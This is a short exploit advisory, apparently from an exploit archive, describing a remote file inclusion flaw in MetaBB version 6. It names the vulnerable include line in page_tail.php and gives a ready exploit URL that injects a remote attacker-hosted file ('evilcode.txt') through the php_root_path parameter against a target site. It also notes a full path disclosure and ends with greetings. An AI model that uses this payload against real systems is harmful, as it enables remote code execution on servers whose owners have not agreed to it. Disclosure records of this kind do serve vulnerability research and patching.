MetaBB version 6 suffers from a remote file inclusion vulnerability.
2fc8ad97bffc99161d1f4d7636cd8b3f442587f0e214860bcc97d8b702a5a2b8
********************************************
*AuThor:Silitoad ***************************
*emA!l:Silitoad[at]hotmail[dot]Com *********
*HoMePaGe: http://www.Arabian-FighterZ.com<http://www.arabian-fighterz.com/>*
********************************************
[Info]
cms: metabb
Version: 6
Download:http://www.hotscripts.com/jump.php?listing_id=61127&jump_type=1
Problem: Include file
bug: include_once($php_root_path .
'rabbitoshi/includes/functions_rabbitoshi_cron.
[Vuls]
1.Full path disclosure:
[Exploit]
http://target.com/MetaBBv6/includes/page_tail.php?php_root_path=http://evilcode.txt
?
[Fix]
Vuls has been reported to author,No reply yet.
[Greetings]
Greets To l1nuxm4,Sn1p8r,Sbitar,Op3runix,simple_clan,l33t_b3k3rz,the leo
from Midt